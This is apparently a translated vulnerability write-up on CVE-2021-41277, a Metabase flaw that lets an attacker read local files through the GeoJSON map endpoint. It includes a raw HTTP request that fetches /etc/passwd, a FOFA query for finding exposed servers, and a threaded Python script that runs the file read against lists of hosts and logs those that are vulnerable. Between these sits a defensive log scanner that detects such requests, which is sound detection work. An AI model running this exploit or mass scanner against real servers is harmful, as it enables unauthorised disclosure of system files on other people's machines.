Metabase Sensitive Information Disclosure Vulnerability (CVE-2021-41277)

0x00 Introduction

Metabase is a simple, open-source data analysis platform. The custom GeoJSON map operation (admin -> settings -> maps -> custom maps -> add a map) lacks permission validation, and an attacker can use this vulnerability to obtain sensitive information.

0x01 Affected Versions

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5

0x02 Environment Setup

docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4

0x03 Vulnerability Reproduction


Capture the request and modify it:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1
Host: 10.108.2.145:3000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=88a28499-7452-4869-bdc9-1c0f69fbf801; _ga=GA1.1.1715384566.1637761316; _gid=GA1.1.1734076727.1637761316
If-Modified-Since: Wed, 24 Nov 2021 13:48:22 GMT
Connection: close

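As an added defensive example (not code from the original post), the following Python scans access-log lines for /api/geojson requests whose url parameter uses a non-HTTP scheme (such as the file: URL above) or a literal internal address. The log lines, the Combined Log Format parser and the field names are constructed assumptions; DNS names are deliberately not resolved so the check runs offline.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [24/Nov/2021:13:48:22 +0000] "GET /api/geojson?url=file:/etc/passwd HTTP/1.1" 200 1827 "-" "Mozilla/5.0"
10.0.0.8 - - [24/Nov/2021:13:49:01 +0000] "GET /api/geojson?url=https%3A%2F%2Fexample.org%2Fmap.geojson HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Nov/2021:13:50:12 +0000] "GET /api/geojson?url=http://10.0.0.5/internal.geojson HTTP/1.1" 200 312 "-" "curl/7.79"
10.0.0.9 - - [24/Nov/2021:13:51:00 +0000] "GET /api/card/1 HTTP/1.1" 200 99 "-" "curl/7.79"
"""

# Minimal Combined Log Format parser: source address, timestamp, method, request target, status.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
ALLOWED_SCHEMES = {"http", "https"}


def suspicious_target(target_url):
    """Return why the server should not fetch target_url, or None if it looks like a public map."""
    parts = urlsplit(target_url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return "non-http scheme '%s'" % (scheme or "(none)")
    host = parts.hostname or ""
    if host == "localhost":
        return "loopback host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None  # a DNS name; not resolved here so the check stays offline
    if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved or ip.is_unspecified:
        return "internal address %s" % ip
    return None


def scan_log(text):
    """Flag /api/geojson requests whose url= value points at a local file or an internal host."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        req = urlsplit(m.group("target"))
        if req.path != "/api/geojson":
            continue
        for value in parse_qs(req.query).get("url", []):  # parse_qs percent-decodes the values
            reason = suspicious_target(value)
            if reason:
                findings.append({"src": m.group("src"), "ts": m.group("ts"), "status": int(m.group("status")), "url": value, "reason": reason})
    return findings
```

Only the first and third sample lines are flagged; the public HTTPS map URL and the unrelated /api/card request pass.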

0x04 Batch Scanning

FOFA query:

app="metabase"
# -*- coding: utf-8 -*-
import requests
import threadpool  # third-party "threadpool" package (pip install threadpool)

requests.packages.urllib3.disable_warnings()


def verify(urls):
    # Request the GeoJSON endpoint with a file: URL; an unpatched instance
    # returns the contents of /etc/passwd in the response body.
    url = urls + '/api/geojson?url=file:/etc/passwd'
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
    try:
        res = requests.get(url, headers=headers, timeout=10, verify=False, allow_redirects=False)
        if 'root' in res.text:
            info = "[+] Vulnerable to CVE-2021-41277: " + urls
            save_vuln(info)
            print(info)
    except Exception:
        # Connection errors and timeouts are ignored.
        pass


def save_vuln(info):
    # Append each confirmed target to vuln.txt.
    vuln = info + '\n'
    with open("vuln.txt", 'a', encoding='utf-8') as ff:
        ff.write(vuln)


def get_file_url():
    # Read one base URL per line from url.txt, skipping blank lines.
    with open("url.txt", 'r', encoding='UTF-8') as f:
        _urls = f.readlines()
    urls = [url.strip() for url in _urls if url and url.strip()]
    return urls


if __name__ == "__main__":
    url = get_file_url()
    pool = threadpool.ThreadPool(200)
    res = threadpool.makeRequests(verify, url)
    for req in res:
        pool.putRequest(req)
    pool.wait()